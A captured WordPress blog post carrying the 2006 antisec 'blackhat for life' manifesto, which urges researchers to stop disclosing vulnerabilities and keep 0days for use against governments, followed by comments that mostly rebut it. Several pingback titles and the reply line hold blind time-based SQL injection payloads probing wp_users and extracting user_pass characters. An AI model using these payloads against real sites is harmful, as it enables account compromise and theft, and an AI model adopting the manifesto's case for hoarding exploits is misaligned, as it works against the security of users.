blackhat for life

January 5, 2006

Stop aiding an industry which just hurts humanity.

Filed under: bantown — antisec @ 12:49 am

[posted to the full-disclosure mailing list]

“In the end, more than freedom, they wanted security. They wanted a comfortable life, and they lost it all – security, comfort, and freedom. When the Athenians finally wanted not to give to society but for society to give to them, when the freedom they wished for most was freedom from responsibility, then Athens ceased to be free and was never free again.” –Edward Gibbon

We stand at the cusp of a renaissance. A freely communicating humanity is closer to unity and harmony than ever before. Never before have ideas and knowledge traveled so rapidly. If not for the Internet, little would be known about the atrocities our government attempts to commit in secret. All the American people would be able to read is the party line off of cable television. With a morally bankrupt media, the Internet is the key to any sort of democratic resistance. Thanks to the Internet, we may view photos of American caskets, wounded Iraqis, and internal government memos. The priveledge of viewing and knowing these things is easily lost.

We approach the final hour of the free Internet. As I write, forces within our society are beginning to impose control and restriction onto it. If these forces are not turned back, I know that within a decade that the free world’s Internet will be a mix of cable television and the supressed Chinese Internet. As a beggar, I present myself with the humility that my lowly position deserves. My plea is simple: stop publishing your vulnerabilities. We will need them.

I want my children and their children to have access to truth. Not just my truth, or my government’s truth, but all the other truths in the world as well.

I want us to be able to communicate easily and safely about the actions of our government.

I want the merits of the Internet to progress in form and finesse until we are ready to cast the criminals, thugs, and mammonites out power all over the world.

A secure Internet is an Internet without freedom, without privacy, and without anonymity. The nature of security is control. Were we to be governed by the just, I would worry little about this situation. Sadly, the political systems of the first world have been perverted by an evil which ensures that none who do not share its nature hold office.

Submitting yourself to a secure system requires that we have a reasonable amount of trust for the system’s keepers. Does your current government have the ideal qualities needed to control the flow of information? We should be keeping everything which may allow us to circumvent the system guarded closely. The subversion of trusted resources will eventually be the only way to keep forbidden information in mass circulation and the primary means of resistance against tyranny.

“If ye love wealth greater than liberty, the tranquility of servitude greater than the animating contest for freedom, go home from us in peace. We seek not your counsel, nor your arms. Crouch down and lick the hand that feeds you. May your chains set lightly upon you; and may posterity forget that ye were our countrymen.” –Samuel Adams

If you place any value on freedom, then stop working for the oligarchy and start working against it. I’ll admit, subversion does not pay well. It isn’t quite as cushy as the six figure job I passed up, but it has a great benefit: I can sleep at night. I’m not aiding a set of corporations and a government which used unethical means to corner vast amounts of wealth and proceeded to flagrantly abuse their power. The reward for doing what is right is better than any earthly reward that I could receive.

“He who passively accepts evil is as much involved in it as he who helps to perpetuate it.” –Martin Luther King, Jr.

To the employees of the biggest security firms of the world, all American, I want you to stop and look at the government of your country. You have an administration which has gone and invaded countries on a whim, which authorizes torture that is conducted in secret, which has less transparency than any government in recent memory, that places extreme emphasis on executive power… the countless historical comparisons that could apply here are obvious so I need not make them. This administration is a perfect example of the type of systemic corruption that is inevitable due to the very nature of power, of control, and yes, of security. People like this will soon be deciding the fate of the Internet.

When engaging in reasonable political discourse is not allowed you are going to be wanting to take your freedom back.

It is time for the last stand. Our mission is to retain the right to freely think, code, and communicate. Stop helping the industry, stop publishing your 0day, start working to make a real difference. Save your arms for the time very soon in which we will need them. Have faith in your self and your God and good works will come. We need not be slaves to a master that despises us!

Non-disclosure is a heroic endeavor. Be a hero.

Government control gives rise to fraud, suppression of Truth, intensification of the black market and artificial scarcity. Above all, it unmans the people and deprives them of initiative, it undoes the teaching of self-help… – Gandhi


Bantown is unprecedented as the first catalyst of the revolution to a have a tollfree customer feedback number. Questions? Comments? Call us at 888-LOL-WHAT. Chat us up at irc.rizon.net #bantown.

22 Comments »

  1. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,1,1)/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,1,1)/* — May 9, 2006 @ 1:32 am

  2. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(2000000,md5(1)),benchmark(2000000,md5(1)))/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(2000000,md5(1)),benchmark(2000000,md5(1)))/* — May 9, 2006 @ 1:34 am

  3. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(ascii(substring(user_pass,1,1))=48,benchmark(2000000,md5(1)),1)/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(ascii(substring(user_pass,1,1))=48,benchmark(2000000,md5(1)),1)/* — May 9, 2006 @ 1:35 am

  4. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(7000000,md5(1)),benchmark(7000000,md5(1)))/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(7000000,md5(1)),benchmark(7000000,md5(1)))/* — May 9, 2006 @ 1:36 am

  5. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(4000000,md5(1)),benchmark(4000000,md5(1)))/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(4000000,md5(1)),benchmark(4000000,md5(1)))/* — May 9, 2006 @ 1:44 am

  6. […] b’)/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(1000000,md5(1)),benchmark(1000000,md5(1)))/*here […]

    Pingback by b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(1000000,md5(1)),benchmark(1000000,md5(1)))/* — May 9, 2006 @ 1:45 am

  7. What an eloquent, well spoken bunch of bullshit.

    Breaking into people’s personal computers is every bit as romantic as shooting someone in the face. The fact of the matter is that an arbitrary execution flaw will not be used to free up the flow of information, except for the flow of information about p3n1s p1lls onto every fresh patch of the `net, always provided to us graciously by zombie machines.

    You want to wake up? Here’s some up-waking for you: Hacking isn’t about allowing “free speech” on the internet (which already exists), it’s about getting big money from underground Mafias. These people aren’t disclosing the flaws to Mozilla’s bug bounty program simply because they think they can make more than $500 via spyware and virii.

    Comment by Noam Samuel — October 1, 2006 @ 12:23 pm

  8. “A secure Internet is an Internet without freedom, without privacy, and without anonymity.”
    This statement, which is the basis for this entire article, or rather movement, is logically completely wrong. It assumes that *every method* to secure “the Internet” will chip away at a civil liberty. Inversely this means that freedom is only achieved through total anarchy. Total anarchy, wherein everyone can infest any other machine with information about “p3n1s p1lls”, as a comment here already states. This conclusion is quite insane. Rather, I think this article is only a diversion: I think it’s only your rationalization to not feel guilty for selling this exploit to the highest bidder.

    Comment by Laveolus — October 1, 2006 @ 5:11 pm

  9. I must also agree that this acticle is utter bullshit! If this is what you need to sleep better at night, then you need some serious help! you ever stop to thik that if you havwe problems sleeping at night that it is becuase deep down, you know you are doing something wrong thats detrimental to society as a whole?

    By securing the browsers and OS’s that we use to surf the internet, it keeps assholes like you out of my machine so I can do what I want with it instead of you spamming or setting up networks so you little script kiddies can propogate even more crap!

    Now I must agree that government regulation of the internet is a bad thing. But what you blackhat’s are doing does nothing more than feed into the paranioa of people worrying about being hacked by jag-off’s like you and gives governments even more power to sieze control of the internet to keep you out!

    Get a life and a clue please!

    Comment by bytor — October 2, 2006 @ 12:20 pm

  10. […] A couple of minutes ago, it seems, antisec replaced imageshack images with its message, reproduced below.  It was kind of a nuisance having my pictures replaced, but you can’t blame them for trying, and while I don’t agree with all of it, they make some valid points. If you’re interested, read about it. […]

    Pingback by Concentration of Secrets — July 10, 2009 @ 9:08 pm

  11. You want freedom of information, but not disclosure of information about security breaches? This is highly contradictory.

    What happens when the information which you want free about how corrupt the government is, causes a security disclosure? Say, for example, that the US Pentagon was found to have information that meant that their was a security weakness in it’s cyber warfare strategy.

    By your proposal, that information should both be free, so you can discuss it “I want us to be able to communicate easily and safely about the actions of our government.” and non free, as it would pose a security disclosure?

    Work out where you stand.

    Comment by AgentScorpion — July 10, 2009 @ 10:01 pm

  12. So….. Will this mean that the image-swap will be just temporary, or permanent? :/

    Comment by kaploy9 — July 10, 2009 @ 10:07 pm

  13. All contradictory and utter bullshit statements aside, you make a fairly valid point. Information, ideas, brainwaves, and truths are all shared as a way of expanding our horizons, understanding, and knowledge. When people share ideas and collaborate our species grows and learns and expands. Sharing of information, ideas, and such are all for the benefit of humanity.

    However, hacking an image hosting site and pointing your finger at anyone who tries to keep any sort of information private or secret and naming them as “mammonites” and generally bad people is not the way to accomplish your goals.

    Comment by Koncernikus — July 10, 2009 @ 10:49 pm

  14. The government will always have more resources than the people. Would the government not be the greater benefactor from unpatched / unknown security holes?

    Comment by a — July 10, 2009 @ 11:41 pm

  15. anyone else wonder why the article is dated 2006 but halfway down the comment chain it switches to 2009.

    Comment by josh — July 11, 2009 @ 9:42 am

  16. You tickle me. Well done, you just made the perfect targets. Go paranoia, you just made it worse, and you signed up for the biggest shitstorm of all time. Good luck.

    Comment by Seeing — July 11, 2009 @ 3:37 pm

  17. Here’s the answer, my friend. I would be honored if you would read it: http://files.abovetopsecret.com/files/aad67f70b7b43ddc.pdf

    Comment by Amaterasu — July 11, 2009 @ 6:58 pm

  18. I’m totally agree with you 🙂 ..

    I didn’t read this long article but I have read your message on Imageshake.com

    Actually I would like to one your team to make the project Bigger

    Nice to see leet BlackHats

    Comment by XxX — July 13, 2009 @ 5:42 am

  19. Well done. The shitstorm you are generating is highly entertaining to me, and I applaud your epic trolling.

    Comment by Anonymous — August 7, 2009 @ 2:52 am

  20. epic troll is epic.
    YOU REQUIRE ADDITIONAL BLACKHATS.

    Comment by Splooge — April 26, 2010 @ 1:41 am

  21. […] question is what the exploits are used for.  From the blackhat for life blog: My plea is simple: stop publishing your vulnerabilities. We will need them… I want us […]

    Pingback by Antisec. Full disclosure. Rethinking my position. | SecurityCurve — June 28, 2011 @ 11:08 am


RSS feed for comments on this post. TrackBack URI

Leave a reply to b')/**/union/**/select/**/user_status/**/from/**/wp_users/**/where/**/ID=1/**/and/**/if(1=1,benchmark(7000000,md5(1)),benchmark(7000000,md5(1)))/* Cancel reply

Create a free website or blog at WordPress.com.